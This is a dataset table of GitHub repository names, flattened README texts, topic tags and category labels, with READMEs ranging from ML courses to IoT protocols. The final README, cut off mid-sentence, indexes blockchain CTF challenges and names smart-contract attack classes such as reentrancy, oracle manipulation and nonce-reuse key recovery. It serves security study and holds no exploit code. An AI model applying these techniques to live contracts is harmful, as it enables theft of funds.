names
stringlengths
1
98
readmes
stringlengths
8
608k
topics
stringlengths
0
442
labels
stringclasses
6 values
zero-to-mastery-ml
zero to mastery machine learning binder https mybinder org badge logo svg https mybinder org v2 gh mrdbourke zero to mastery ml master colab https colab research google com assets colab badge svg https colab research google com github mrdbourke zero to mastery ml blob master welcome this repository contains all of the code notebooks images and other materials related to the zero to mastery machine learning course on udemy https dbourke link mlcourse and zerotomastery io https dbourke link ztmmlcourse quick links watch the first 10 hours of the course on youtube https youtu be r67sfaiyadi read the materials of the course in a beautiful online book https dev mrdbourke com zero to mastery ml found something wrong with the code leave an issue https github com mrdbourke zero to mastery ml issues got a question post a discussion https github com mrdbourke zero to mastery ml discussions see the question template https github com mrdbourke zero to mastery ml discussions 48 updates 12 october 2023 created an online book version of the course materials see https dev mrdbourke com zero to mastery ml currently a work in progress 7 sep 2023 onward working on updating the materials for 2024 see the progress in 63 https github com mrdbourke zero to mastery ml discussions 63 25 aug 2023 update section 3 end to end bulldozer regression notebook for scikit learn 1 3 column order for predictions should match column order for training see 62 https github com mrdbourke zero to mastery ml discussions 62 for more what this course focuses on 1 create a framework for working through problems 6 step machine learning modelling framework https github com mrdbourke zero to mastery ml blob master section 1 getting ready for machine learning a 6 step framework for approaching machine learning projects md 2 find tools to fit the framework 3 targeted practice use tools and framework steps to work on end to end machine learning modelling projects how this course is structured section 1 getting your mind and computer ready for machine learning concepts computer setup section 2 tools for machine learning and data science pandas numpy matplotlib scikit learn section 3 end to end structured data projects classification and regression section 4 neural networks deep learning and transfer learning with tensorflow 2 0 section 5 communicating and sharing your work student notes some students have taken and shared extensive notes on this course see them below if you d like to submit yours leave a pull request 1 chester s notes https github com chesterheng machinelearning datascience 2 sophia s notes https www rockyourcode com tags udemy complete machine learning and data science zero to mastery
machine-learning data-science deep-learning
ai
llm
spdx filecopyrighttext marcel klehr mklehr gmx net spdx license identifier cc0 1 0 https raw githubusercontent com nextcloud llm main screenshots logo png a large language model in nextcloud this app ships a textprocessing provider using a large language model that runs locally on cpu the models run completely on your machine no private data leaves your servers models llama 2 by meta languages english llama 2 community license https download nextcloud com server apps llm llama 2 7b chat ggml license gpt4all falcon by nomic ai languages english apache license 2 0 https download nextcloud com server apps llm license requirements x86 cpu gnu lib c musl is not supported python 3 10 including python venv nextcloud all in one with nextcloud aio this app is not going to work because aio uses musl however you can use this community container https github com nextcloud all in one tree main community containers local ai as replacement for this app ethical ai rating rating positive the software for training and inference of this model is open source the trained model is freely available and thus can be run on premises the training data is freely available making it possible to check or correct for bias or optimise the performance and co2 usage learn more about the nextcloud ethical ai rating in our blog https nextcloud com blog nextcloud ethical ai rating install place this app in nextcloud apps building the app the app can be built by using the provided makefile by running make this requires the following things to be present make which tar for building the archive curl used if phpunit and composer are not installed to fetch them from the web npm for building and testing everything js only required if a package json is placed inside the js folder
ai
catberry
catberry build status https travis ci org catberry catberry svg branch master https travis ci org catberry catberry codecov io http codecov io github catberry catberry coverage svg branch master http codecov io github catberry catberry branch master gitter https badges gitter im join 20chat svg https gitter im catberry main utm source badge utm medium badge utm campaign pr badge utm content body badge p align center img src https raw githubusercontent com catberry catberry master docs images logo png p what the cat is that catberry was developed to help create isomorphic universal web applications https github com catberry catberry blob 9 0 0 docs index md isomorphicuniversal applications long story short isomorphic universal applications are apps that use the same codebase on both the server and client environments to render what the client would see as a single page application http en wikipedia org wiki single page application tldr install catberry cli https www npmjs com package catberry cli using following command bash npm install g catberry cli use catberry cli to create an empty project with handlebars http handlebarsjs com support like this bash catberry init empty handlebars or an example application that works using github api bash catberry init example also you can get a list of all templates bash catberry init useful links catberry documentation https github com catberry catberry blob 9 0 0 docs index md get started guide https github com catberry catberry blob 9 0 0 docs index md get started plugins and tools https github com catberry catberry blob 9 0 0 docs index md plugins and tools catberry s homepage https catberry github io todo application https github com catberry catberry todomvc example application https github com catberry catberry example why should i use that architecture the entire architecture of the framework is built using the service locator https github com catberry catberry blob 9 0 0 docs index md service locator pattern which helps to manage module dependencies and create plugins https github com catberry catberry and flux https github com catberry catberry blob 9 0 0 docs index md flux for the data layer cat components https github com catberry catberry blob 9 0 0 docs index md cat components similar to web components http webcomponents org but organized as directories can be rendered on the server and published installed as npm packages catberry builds a bundle for running the application in a browser as a single page application http en wikipedia org wiki single page application es2015 es6 support https nodejs org en docs es6 native on the server node js and using babel http babeljs io for a browser the whole framework s api uses promises https developer mozilla org en docs web javascript reference global objects promise framework itself is an express https github com visionmedia express connect https github com senchalabs connect middleware which means you can use it with other middlewares http expressjs com en guide using middleware html rendering fast and efficient progressive rendering engine http www phpied com progressive rendering via multiple flushes based on node js streams http nodejs org api stream html stream api for stream implementors on the server browser rendering does not block the event loop https developer mozilla org en docs web javascript eventloop which means your app s ui will never be frozen handlebars https github com catberry catberry handlebars dust https github com catberry catberry dust and pug https github com catberry catberry pug template engines are officially supported https github com catberry catberry blob 9 0 0 docs index md template engines and you can implement your own provider to support any other efficient dom event listening using event delegation http davidwalsh name event delegate for more details please proceed to catberry documentation https github com catberry catberry blob 9 0 0 docs index md typical cat component example javascript use strict class coolcomponent creates a new instance of the coolcomponent component param servicelocator locator the service locator for resolving dependencies constructor locator you can resolve any dependency from the locator gets data for the template this method is optional returns promise object object null undefined data for the template render return this context getstoredata returns event binding settings for the component this method is optional returns promise object object null undefined binding settings bind return css selector clickable window alert ouch cleans up everything that has not been set by bind method this method is optional returns promise undefined promise of nothing unbind nothing to do here we have used bind properly module exports some the component is used as a custom tag html cat cool id unique value cat store group coolstore cat cool typical store example javascript use strict class coolstore creates a new instance of the coolstore store param servicelocator locator the service locator for resolving dependencies constructor locator current universal http request for environment independent requests type uhr private this uhr locator resolve uhr current lifetime of data in milliseconds that is returned by this store type number lifetime in milliseconds this lifetime 60000 loads data from a remote source returns promise object object null undefined loaded data load here you can do any http requests using this uhr please read details here https github com catberry catberry uhr handles an action named some action from any component or store returns promise object object null undefined response to the component store handlesomeaction here you can call this context changed if you re sure that the remote data on the server has been changed you can additionally have many handle methods for other actions module exports some browser support while catberry is capable of rendering pages for any browser on the server due to the use of certain html5 features like the history api https developer mozilla org en us docs web guide api dom manipulating the browser history only partial support of old browsers is possible for the client side javascript application the main goal of the catberry framework is to use the full power of new technologies and provide a user with the best possible experience in fact a user gets an html page from the server only once and all the rest of the time the whole page is changing in a browser receiving only pure data from api service s used with the application thanks to catberry s progressive rendering engine user receives a page from the server component by component as fast as each component renders its template not waiting for the whole page is built catberry supports 2 last versions of modern browsers and ie 11 it depends on babel babel preset env https github com babel babel preset env preset which config you can override putting a babelrc file in your project contributing there are a lot of ways to contribute into catberry give it a star join the gitter https gitter im catberry main room and leave a feedback or help with answering users questions submit a bug or a feature request https github com catberry catberry issues submit a pr https github com catberry catberry blob 9 0 0 contributing md if you like the logo you might want to buy a catberry t shirt http www redbubble com people catberryjs works 14439373 catberry js framework logo p t shirt or a sticker http www redbubble com people catberryjs works 14439373 catberry js framework logo p sticker denis rechkunov denis rdner de
javascript universal isomorphic web framework components progressive-rendering
front_end
awesome-iot-document
awesome iot https github com phodal awesome iot http github com phodal eks iot struct struct jpg iot protocol protocol coap xmpp restful http mqtt transport udp tcp tcp tcp messaging request response publish subscribe request response request response publish subscribe request response 2g 3g 4g suitability 1000s nodes excellent excellent excellent excellent lln suitability 1000s nodes excellent fair fair fair compute resources 10ks ram flash 10ks ram flash 10ks ram flash 10ks ram flash success storied utility field area networks remote management of consumer white goods smart energy profile 2 premise energy management home services extending enterprise messaging into iot applications english english version en md xmpp xmpp xml xml xmpp xmpp xmpp xmpp mqtt mqtt images mqtt png mqtt message queuing telemetry transport ibm twitter mqtt protocol mqtt lib md mqtt protocol mqtt lib md coap coap images coap jpg coap constrained application protocol m2m pc tcp http tcp http coap coap udp http tcp coap 4 restful http rest restful web rest thread thread images thread jpg thread ipv6 thread thread 802 15 4 thread web z wave z wave 908 42mhz 868 42mhz fsk bfsk gfsk 9 6 kbps 30m 100m z wave zigbee zigbee ieee802 15 4 zigbee bee zig zigbee websocket websocket protocol html5 full duplex soap xml web 6lowpan ietf 6lowpan ip bacnet lonworks ac udp udp tcp osi ip udp udp udp udp udp uip uip adam dunkels c uip tcp ip ip tcp icmp udp arp dtls dtls datagram transport layer security tls udp datagram tls tls udp tls dtls 1 0 tls 1 1 dtls 1 2 tls 1 2 nfc nfc rfid 13 56mhz wifi wi fi pad wi fi ieee 802 11 ieee 802 11 wi fi wlan yeelink http www yeelink net http www yeelink net sitewhere the open platform for the internet of things sitewhere mongodb apachehbase http www sitewhere org http www sitewhere org devicehive web devicehub devicehub http www devicehive com http www devicehive com devicehub net devicehub net http devicehub net http devicehub net iot toolkit http coap http iot toolkit com http iot toolkit com mango nimbits nimbits ec2 j2ee arduino javascript html nimbits io java openremote openremote java thingspeak thingspeak http arduino iobridge realtime io electic lmp matlab real time operating system rtos contiki coap tcp ip rpl 6lowpan rime contiki tcp ip contiki c k contiki 8 contiki kilobyte tcp ip lwip lwip light weight ip lwip tcp ram kb ram 40k rom lwip lwip lwip lwip api freertos freertos rtos ram c os ii embos salvo freertos ram c os ii embos freertos 8 0 0 mbed os mbed os images mbedos png ble celluar wifi zigbee 6lowpan arm cortex m 2g 3g cdma thread wi fi 802 15 4 6lowpan tls dtls coap http mqtt m2m 32 64kbram 256 kb mbed os is an operating system for iot devices and is especially well suited to run in energy constrained environments the os includes the connectivity security and device management functionalities required in every iot device connectivity protocol stack support for bluetooth low energy cellular ethernet thread wi fi zigbee ip zigbee nan 6lowpan automation of power management software asset protection and secure firmware updates for device security management supports a wide range of arm cortex m based hardware platforms from major mcu vendors support for oma lightweight m2m protocol for device management updatable and secure devices at the edge capable of additional processing and functionality banking class end to end ip security across the communication channels through tls dtls future proof designs by supporting all the key open standards for connectivity and device management emos embos ram rom embos rtos embos rom 1kb rom 30 ram embos salvo salvo is the first real time operating system rtos designed expressly for very low cost embedded systems with severely limited program and data memory with salvo you can quickly create low cost smart and sophisticated embedded products pumpkin has currently certified salvo for use with c os ii uc os ii micro control operation system two rom rtos uc os ii ansi c 40 8 64 cpu dsp uc os ii 60 1992 uc os ii tinyos coap tinycoap http tinyos stanford edu tinyos wiki index php coap 13 tinyos uc berkeley component based tinyos tinyos mqx freescale mqx rtos a full featured complimentary real time operating system including the mqx kernel tcp ip stack rtcs embedded ms dos file system mfs usb host device stack and more the mqx multitasking kernel provides pre emptive scheduling fast interrupt response extensive inter process communication and synchronization facilities mqx rtos includes its own peripheral drivers qnx qnx qssl qnx software system ltd intel x86 pentium cpu powerpc mips cpu qnx posix openwrt openwrt linux dd wrt tomato openwrt openwrt openwrt riot http riot os org http riot os org msp430 arm7 cortex m0 cortex m3 cortex m4 x86 riot riot feuerwhere 2013 msp430 arm7 cortex m0 cortex m3 cortex m4 x86 coap libcoap c http sourceforge net projects libcoap http sourceforge net projects libcoap lightweight application protocol for devices that are constrained their resources such as computing power rf range memory bandwith or network packet sizes this protocol coap is developed in the ietf working group core http 6lowapp net jcoap java https code google com p jcoap https code google com p jcoap jcoap is a java library implementing the constrained application protocol coap node coap javascript nodejs https github com mcollina node coap https github com mcollina node coap node coap is a client and server library for coap modelled after the http module coap python https github com openwsn berkeley coap https github com openwsn berkeley coap a coap python library this package implements the constrained application protocol coap developed by the ietf core working group californium cf coap java https github com mkovatsc californium https github com mkovatsc californium californium cf is an open source implementation of the constrained application protocol coap it is written in java and targets unconstrained environments such as back end service infrastructures e g proxies resource directories or management services and less constrained environments such as embedded devices running linux e g smart home controllers or vehicle sensors californium cf has been running code for the ietf standardization of coap and was recently reimplemented to straighten changed design decisions but also to improve its performance with focus on scalability the new implementation was successfully tested at the etsi coap 3 and oma lwm2m plugtests in november 2013 rest cjson c http sourceforge net projects cjson http sourceforge net projects cjson json javascriptobject notation javascript json c json curl c http curl haxx se http curl haxx se curl url unix linux dos win32 win64 hivemq java http www hivemq com http www hivemq com hivemq mqtt m2m hivemq learning internet of things https www packtpub com application development learning internet things peter waher 2015 02 book ebook http designiot phodal com phodal fengda fortware 2014 11 learning internet of things web restful web apis leonard richardson mike amundsen 2014 06 rest 2011 09 arduino michael mcroberts 2013 03 arduino cookbook michael margolis 2011 04 raspberry pi eben upton 2013 08 license cc https i creativecommons org l by nc 4 0 88x31 png attribution noncommercial 4 0 international cc by nc 4 0 http creativecommons org licenses by nc 4 0 2014 phodal huang http www phodal com
server
sightseq
sightseq now let s go sight seeing by vision and seq uence language multimodal around the deep learning world what s new july 30 2019 add faster rcnn models and i rename this repo from image captioning to sightseq this is the last time i rename this repo i promise june 11 2019 i rewrite the text recognition part base on fairseq https github com pytorch fairseq stable version refer to branch crnn https github com zhiqwang image captioning tree crnn which provides pre trained model checkpoints current branch is work in process very pleasure for suggestion and cooperation in the fairseq text recognition project features sightseq provides reference implementations of various deep learning tasks including text recognition shi et al 2015 crnn an end to end trainable neural network for image based sequence recognition and its application to scene text recognition https arxiv org abs 1507 05717 object detection new ren et al 2015 faster r cnn towards real time object detection with region proposal networks https arxiv org abs 1506 01497 additionally all features of fairseq flexible to enable convolution layer recurrent layer in crnn positional encoding of images general requirements and installation pytorch http pytorch org there is a bug https github com pytorch pytorch pull 21244 in nn ctcloss https pytorch org docs master nn html ctcloss which is solved in nightly version python version 3 5 fairseq https github com pytorch fairseq version 0 7 1 torchvision https github com pytorch vision version 0 3 0 for training new models you ll also need an nvidia gpu and nccl https github com nvidia nccl pre trained models and examples text recognition examples text recognition object detection examples object detection license sightseq is mit licensed the license applies to the pre trained models as well
crnn ctc scene-texts pytorch ocr attention transformer image-captioning text-recognition mobilenet densenet object-detection faster-rcnn
ai
PuppyGo
puppygo vision language model and large language model powered embodied agent div p img src src voxposer gif width 430 img src src puppygo jpg width 320 p div here s what i did language models as zero shot planners extracting actionable knowledge for embodied agents extracts affordances and constraints from large language models and vision language models to compose 3d value maps which are used by motion planners to zero shot synthesize trajectories for everyday manipulation tasks combine with e2e large model trainning framework like uniad this package is sponsorware https img shields io static v1 label sponsor message e2 9d a4 logo github color 23fe8e86 https github com sponsors charmve frequency one time sponsor charmve https github com sponsors charmve frequency one time sponsor charmve this repo was only available to my sponsors on github sponsors until i reached 15 sponsors learn more about sponsorware at github com sponsorware docs https github com sponsorware docs image https github com charmve puppygo assets 29084184 3577e267 53a0 4904 909f 6733995e892e br execution under disturbances because the language model output stays the same throughout the task we can cache its output and re evaluate the generated code using closed loop visual feedback which enables fast replanning using mpc this enables voxposer to be robust to online disturbances div class columns div class column has text centered video id dist1 controls muted autoplay loop width 99 source src src sort trash to tray dist mp4 type video mp4 video p style text align center sort the paper trash into the blue tray p div div class column has text centered video id dist2 controls muted autoplay loop width 99 source src src close top drawer dist mp4 type video mp4 video p style text align center close the top drawer p div div
chatgpt deepmind embodied-agent palm2 rt-2 voxposer
ai
tpf-pythondataapp-ITBA
building a data system with airflow the goal of this practice is to build a system that logs the daily price of different stocks instructions 1 setup airflow using the official docker compose yaml file this can be obtained here https airflow apache org docs apache airflow stable start docker html docker compose yaml before starting we suggest changing one line in the docker compose file to disable the automatic loading of examples to avoid ui clutter airflow core load examples true to airflow core load examples false by default this setup creates a dags directory in the host from which airflow obtains the dag definitions after the initial setup an airflow instance should be reachable in http localhost 8080 home the default username and password are airflow airflow 2 create another database in the postgres used by airflow to store the stocks data 3 develop the data model to store the daily stock data symbol date open high low close using sqlalchemy s declarative base then create the tables in the db 4 create a python class similar to the sqliteclient of the practical airflow coursework in order to connect with the postgres db you should implement the same methods present in the sqliteclient bonus try to write a parent base db api class and make the sqlite and postgres client inherit from it 5 develop a dag that obtains the price information of google goog microsoft msft and amazon amzn and then inserts the data in the database using the python class developed in the previous point for this we suggest using the following api https www alphavantage co the python files that define the dags should be placed in the dags directory previosly mentioned 6 add another task the that depends on the first one that fetches data from the database of the last week and produces a plot of the value of each stock during said time period 7 add two unit tests runnable with pytest https docs pytest org that can be run from the commandline one that tests the extraction this refers to the formatting that takes place after the data is fetched from the api that is to be inserted in the db another for the aggregation of the values used for plotting after they are extracted from the db 8 implement a ci step using github actions https docs github com en actions to run the unit tests using pytest each time a commit is pushed to a branch in a pr in case of failure the result should be visible in github s merge request ui extras using the suggested docker compose setup you can access the database using airflow as both busername and password in the following way sudo docker compose exec airflow webserver psql h postgres password for user airflow psql 11 13 debian 11 13 0 deb10u1 server 13 4 debian 13 4 4 pgdg110 1 warning psql major version 11 server major version 13 some psql features might not work type help for help airflow in the same way you can open a shell to work inside the docker containers using sudo docker compose exec airflow webserver bin bash this can be useful when creating the tables that will hold the data when connecting to the db from inside the container you can use the default value of the airflow core sql alchemy conn variable defined in the compose file bonus points if you want to go an extra mile you can do the following add the configs for pylint https pylint org and black https black readthedocs io en stable implement a ci step using github actions https docs github com en actions to run pylint each time a commit is pushed to a branch in a pr
airflow python github-actions
cloud
ThingsBoard
thingsboard aluno lucas dutra ferreira do nascimento matr cula 17 0050939 requisitos do projeto gcc vscode platformio biblioteca do vscode esp32 placa utilizada para o desenvolvimento dht11 sensor de umidade e temperatura sw 520d sensor de inclina o ambiente desenvolvido o projeto foi desenvolvido em um macos m1 monterey 12 6 como executar o projeto o passo a passo considera que todos os requisitos do projeto foram cumpridos 1 conectar a placa esp32 ao computador 2 abrir o diret rio do projeto utilizando o editor de texto vscode 3 com ajuda das ferramentas da biblioteca platformio compilar o c digo do projeto compile img compile png 4 utilizando das ferramentas da biblioteca platformio fa a upload do c digo para a placa necess rio pressionar o bot o de boot para ativar o modo download upload img upload png 5 agora basta reconectar e conectar novamente a placa do computador para o firmware implementado entrar em vigor 6 acesse o dashboard do thingsboard http 164 41 98 25 443 dashboards 22d1c780 379d 11ed be92 e3a443145aec para a es relacionadas placa v deo de demonstra o https youtu be kcqduccqccu
c esp32 mqtt platformio
os
sentimentalizer
archived it is 2023 you should be using something else for sentiment analysis maybe this https huggingface co blog sentiment analysis python is something you can use sentimentalizer inspired by sentan https github com martinrue sentan node sentiment https github com martinrue node sentiment this gem can be used separately or integrated with rails app instructions for rails use 1 install gem using bundler gem sentimentalizer 2 run rails g sentimentalizer this will generate an initializer file with after initialize hook for rails it s basically training a model to use in the application it will run everytime you start server or run any rake commands would love some input on this 3 now you can run following after require sentimentalizer ruby sentimentalizer analyze message or tweet or status or for json output sentimentalizer analyze message or tweet or status true you will get output like this ruby sentimentalizer analyze i am so happy text i am so happy probability 0 937 sentiment sentimentalizer analyze i am so happy true text i am so happy probability 0 937 sentiment instructions for vanilla ruby use 1 install gem using bundler gem sentimentalizer 2 either fire up irb or require it in your project with require sentimentalizer 3 now you need to train the engine in order to use it ruby require sentimentalizer sentimentalizer setup or wrap it in a class so setup can be automatic class analyzer def initialize sentimentalizer setup end def process phrase sentimentalizer analyze phrase end end or for json output sentimentalizer analyze message or tweet or status true and now you will get output like this ruby analyzer analyzer new analyzer process i am so happy text i am so happy probability 0 937 sentiment analyzer process i am so happy true text i am so happy probability 0 937 sentiment contributing to sentimentalizer check out the latest master to make sure the feature hasn t been implemented or the bug hasn t been fixed yet check out the issue tracker to make sure someone already hasn t requested it and or contributed it fork the project start a feature bugfix branch commit and push until you are happy with your contribution make sure to add tests for it this is important so i don t break it in a future version unintentionally please try not to mess with the rakefile version or history if you want to have your own version or is otherwise necessary that is fine but please isolate to its own commit so i can cherry pick around it copyright copyright c 2018 malavbhavsar see license txt for further details
rails ruby machine-learning sentiment-analysis naive-bayes
ai
Geobuddy
geobuddy contributor ling ye brian suitt yi sui see all the technical details in the tech report
os
human-eval
humaneval hand written evaluation set this is an evaluation harness for the humaneval problem solving dataset described in the paper evaluating large language models trained on code https arxiv org abs 2107 03374 installation make sure to use python 3 7 or later conda create n codex python 3 7 conda activate codex check out and install this repository git clone https github com openai human eval pip install e human eval usage this program exists to run untrusted model generated code users are strongly encouraged not to do so outside of a robust security sandbox the execution call https github com openai human eval blob master human eval execution py l48 l58 in execution py is deliberately commented out to ensure users read this disclaimer before running code in a potentially unsafe manner see the comment in execution py for more information and instructions after following the above instructions to enable execution generate samples and save them in the following json lines jsonl format where each sample is formatted into a single line like so task id corresponding humaneval task id completion completion only without the prompt we provide example problem jsonl and example solutions jsonl under data to illustrate the format and help with debugging here is nearly functional example code you just have to provide generate one completion to make it work that saves generated completions to samples jsonl from human eval data import write jsonl read problems problems read problems num samples per task 200 samples dict task id task id completion generate one completion problems task id prompt for task id in problems for in range num samples per task write jsonl samples jsonl samples to evaluate the samples run evaluate functional correctness samples jsonl reading samples 32800it 00 01 23787 50it s running test suites 100 32800 32800 16 11 00 00 33 76it s writing results to samples jsonl results jsonl 100 32800 32800 00 00 00 00 42876 84it s pass 1 pass 10 pass 100 this script provides more fine grained information in a new file ending in input path results jsonl each row now contains whether the completion passed along with the execution result which is one of passed timed out or failed as a quick sanity check the example samples should yield 0 5 pass 1 evaluate functional correctness data example samples jsonl problem file data example problem jsonl reading samples 6it 00 00 3397 11it s running example suites 100 6 6 00 03 00 00 1 96it s writing results to data example samples jsonl results jsonl 100 6 6 00 00 00 00 6148 50it s pass 1 0 4999999999999999 because there is no unbiased way of estimating pass k when there are fewer samples than k the script does not evaluate pass k for these cases to evaluate with other k values pass k comma separated values here for other options see evaluate functional correctness help however we recommend that you use the default values for the rest known issues while evaluation uses very little memory you might see the following error message when the system is running out of ram since this may cause some correct programs to fail we recommend that you free some memory and try again malloc can t allocate region citation please cite using the following bibtex entry article chen2021codex title evaluating large language models trained on code author mark chen and jerry tworek and heewoo jun and qiming yuan and henrique ponde de oliveira pinto and jared kaplan and harri edwards and yuri burda and nicholas joseph and greg brockman and alex ray and raul puri and gretchen krueger and michael petrov and heidy khlaaf and girish sastry and pamela mishkin and brooke chan and scott gray and nick ryder and mikhail pavlov and alethea power and lukasz kaiser and mohammad bavarian and clemens winter and philippe tillet and felipe petroski such and dave cummings and matthias plappert and fotios chantzis and elizabeth barnes and ariel herbert voss and william hebgen guss and alex nichol and alex paino and nikolas tezak and jie tang and igor babuschkin and suchir balaji and shantanu jain and william saunders and christopher hesse and andrew n carr and jan leike and josh achiam and vedant misra and evan morikawa and alec radford and matthew knight and miles brundage and mira murati and katie mayer and peter welinder and bob mcgrew and dario amodei and sam mccandlish and ilya sutskever and wojciech zaremba year 2021 eprint 2107 03374 archiveprefix arxiv primaryclass cs lg
ai
ctf-blockchain
ctf blockchain challenges this repository collects blockchain challenges in ctfs and wargames these challenges are categorized by topic not by difficulty or recommendation also there are my writeups and exploits for some challenges e g paradigm ctf 2022 src paradigmctf2022 if there are any incorrect descriptions i would appreciate it if you could let me know via issue or pr table of contents ethereum ethereum contract basics contract basics evm puzzles evm puzzles misuse of tx origin misuse of txorigin weak sources of randomness from chain attributes weak sources of randomness from chain attributes erc 20 basics erc 20 basics storage overwrite by delegatecall storage overwrite by delegatecall context mismatch in delegatecall context mismatch in delegatecall integer overflow integer overflow non executable ether transfers to contracts non executable ether transfers to contracts forced ether transfers to contracts via selfdestruct forced ether transfers to contracts via selfdestruct large gas consumption by contract callees large gas consumption by contract callees forgetting to set view pure to interface and abstract contract functions forgetting to set viewpure to interface and abstract contract functions view functions that do not always return same values view functions that do not always return same values mistakes in setting storage and memory mistakes in setting storage and memory tracing transactions tracing transactions reversing states reversing states reversing transactions reversing transactions reversing evm bytecodes reversing evm bytecodes evm bytecode golf evm bytecode golf jump oriented programming jump oriented programming gas optimization gas optimization collisions when using abi encodepacked with variable length arguments collisions when using abiencodepacked with variable length arguments bypassing verifications with zero iteration loops bypassing verifications with zero iteration loops reentrancy attacks reentrancy attacks flash loan basics flash loan basics governance attacks by executing flash loans during snapshots governance attacks by executing flash loans during snapshots bypassing repayments of push architecture flash loans bypassing repayments of push architecture flash loans bugs in amm price calculation algorithm bugs in amm price calculation algorithm attacks using custom tokens attacks using custom tokens oracle manipulation attacks without flash loans oracle manipulation attacks without flash loans oracle manipulation attacks with flash loans oracle manipulation attacks with flash loans sandwich attacks sandwich attacks recoveries of private keys by same nonce attacks recoveries of private keys by same nonce attacks brute forcing addresses brute forcing addresses recoveries of public keys recoveries of public keys encryption and decryption in secp256k1 encryption and decryption in secp256k1 bypassing bots and taking erc 20 tokens owned by wallets with known private keys bypassing bots and taking erc 20 tokens owned by wallets with known private keys claimable intermediate nodes of merkle trees claimable intermediate nodes of merkle trees precompiled contracts precompiled contracts faking errors faking errors foundry cheatcodes foundry cheatcodes front running front running back running back running head overflow bugs in calldata tuple abi reencoding solidity 0 8 16 head overflow bugs in calldata tuple abi reencoding solidity 0816 overwriting storage slots via local storage variables solidity 0 8 1 overwriting storage slots via local storage variables solidity 081 overwriting arbitrary storage slots by setting array lengths to 2 256 1 solidity 0 6 0 overwriting arbitrary storage slots by setting array lengths to 2256 1 solidity 060 constructors that is just functions by typos solidity 0 5 0 constructors that is just functions by typos solidity 050 overwriting storage slots via uninitialized storage pointer solidity 0 5 0 overwriting storage slots via uninitialized storage pointer solidity 050 other ad hoc vulnerabilities and methods other ad hoc vulnerabilities and methods bitcoin bitcoin bitcoin basics bitcoin basics recoveries of private keys by same nonce attacks recoveries of private keys by same nonce attacks 1 bypassing pow of other applications using bitcoin s pow database bypassing pow of other applications using bitcoins pow database cairo cairo solana solana move move other blockchain related other blockchain related ethereum note if an attack is only valid for a particular version of solidity and not for the latest version the version is noted at the end of the heading to avoid notation fluctuations evm terms are avoided as much as possible and solidity terms are used contract basics these challenges can be solved if you know the basic mechanics of ethereum the basic language specification of solidity https docs soliditylang org en latest and the basic operation of contracts challenge note keywords capture the ether deploy a contract src capturetheether faucet wallet capture the ether call me src capturetheether contract call capture the ether choose a nickname src capturetheether contract call capture the ether guess the number src capturetheether contract call capture the ether guess the secret number src capturetheether keccak256 ethernaut 0 hello ethernaut src ethernaut contract call abi ethernaut 1 fallback src ethernaut receive ether function paradigm ctf 2021 hello src paradigmctf2021 contract call 0x41414141 ctf sanity check src 0x41414141ctf contract call paradigm ctf 2022 random src paradigmctf2022 contract call downunderctf 2022 solve me src downunderctf2022 evm puzzles puzzle challenges that can be solved by understanding the evm specifications no vulnerabilities are used to solve these challenges challenge note keywords capture the ether guess the new number src capturetheether block number block timestamp capture the ether predict the block hash src capturetheether blockhash ethernaut 13 gatekeeper one src ethernaut msg sender tx origin gasleft mod 8191 0 type conversion ethernaut 14 gatekeeper two src ethernaut msg sender tx origin extcodesize is 0 cipher shastra minion msg sender tx origin extcodesize is 0 block timestamp seccon beginners ctf 2020 c4b block number paradigm ctf 2021 babysandbox src paradigmctf2021 babysandbox staticcall call delegatecall extcodesize is 0 paradigm ctf 2021 lockbox ecrecover abi encodepacked msg data length ethernautdao 6 no name src ethernautdao noname block number gas price war fvictorio s evm puzzles src fvictorioevmpuzzles huff challenge challenge 3 src huffchallenge paradigm ctf 2022 lockbox2 src paradigmctf2022 paradigm ctf 2022 sourcecode src paradigmctf2022 quine numen cyber ctf 2023 littlemoney src numenctf function pointer numen cyber ctf 2023 asslot src numenctf staticcall that return different values misuse of tx origin tx origin refers to the address of the transaction publisher and should not be used as the address of the contract caller msg sender challenge note keywords ethernaut 4 telephone src ethernaut weak sources of randomness from chain attributes since contract bytecodes are publicly available it is easy to predict pseudorandom numbers whose generation is completed on chain using only states not off chain data it is equivalent to having all the parameters of a pseudorandom number generator exposed if you want to use random numbers that are unpredictable to anyone use a decentralized oracle with a random number function for example chainlink vrf https docs chain link docs chainlink vrf which implements verifiable random function vrf challenge note keywords capture the ether predict the future src capturetheether ethernaut 3 coin flip src ethernaut downunderctf 2022 crypto casino src downunderctf2022 erc 20 basics these challenges can be solved with an understanding of the erc 20 token standard https eips ethereum org eips eip 20 challenge note keywords ethernaut 15 naught coin src ethernaut transfer approve transferfrom paradigm ctf 2021 secure src paradigmctf2021 weth defi security summit stanford vtoken src defisecuritysummitstanford storage overwrite by delegatecall delegatecall is a potential source of vulnerability because the storage of the delegatecall caller contract can be overwritten by the called contract challenge note keywords ethernaut 6 delegation src ethernaut ethernaut 16 preservation src ethernaut ethernaut 24 puzzle wallet src ethernaut proxy contract ethernaut 25 motorbike src ethernaut proxy contract eip 1967 standard proxy storage slots https eips ethereum org eips eip 1967 defi security summit stanford insecureumlenderpool src defisecuritysummitstanford flash loan quillctf2023 d3l3g4t3 src quillctf2022 d3l3g4t3 numen cyber ctf 2023 counter src numenctf writing evm code context mismatch in delegatecall contracts called by delegatecall are executed in the context of the delegatecall caller contract if the function does not carefully consider the context a bug will be created challenge note keywords ethernautdao 3 carmarket src ethernautdao carmarket non use of address this integer overflow for example subtracting 1 from the value of a variable of uint type when the value is 0 causes an arithmetic overflow arithmetic overflow has been detected and reverted state since solidity v0 8 0 contracts written in earlier versions can be checked by using the safemath library https github com openzeppelin openzeppelin contracts blob release v3 4 contracts math safemath sol challenge note keywords capture the ether token sale src capturetheether multiplication capture the ether token whale src capturetheether subtraction ethernaut 5 token src ethernaut subtraction non executable ether transfers to contracts do not create a contract on the assumption that normal ether transfer send or transfer can always be executed if a destination is a contract and there is no receive ether function or payable fallback function ether cannot be transferred however instead of the normal transfer functions the selfdestruct described below can be used to force such a contract to transfer ether challenge note keywords ethernaut 9 king src ethernaut project sekai ctf 2022 random song src projectsekaictf2022 randomsong chainlink vrf forced ether transfers to contracts via selfdestruct if a contract does not have a receive ether function and a payable fallback function it is not guaranteed that ether will not be received when a contract executes selfdestruct it can transfer its ether to another contract or eoa and this selfdestruct transfer can be forced even if the destination contract does not have the receive ether function and the payable fallback function if the application is built on the assumption that the ether is 0 it could be a bug challenge note keywords capture the ether retirement fund src capturetheether integer overflow ethernaut 7 force src ethernaut large gas consumption by contract callees a large amount of gas can be consumed by loops and recursion in call and there may not be enough gas for the rest of the process until solidity v0 8 0 zero division and assert false could consume a lot of gas challenge note keywords ethernaut 20 denial src ethernaut forgetting to set view pure to interface and abstract contract functions if you forget to 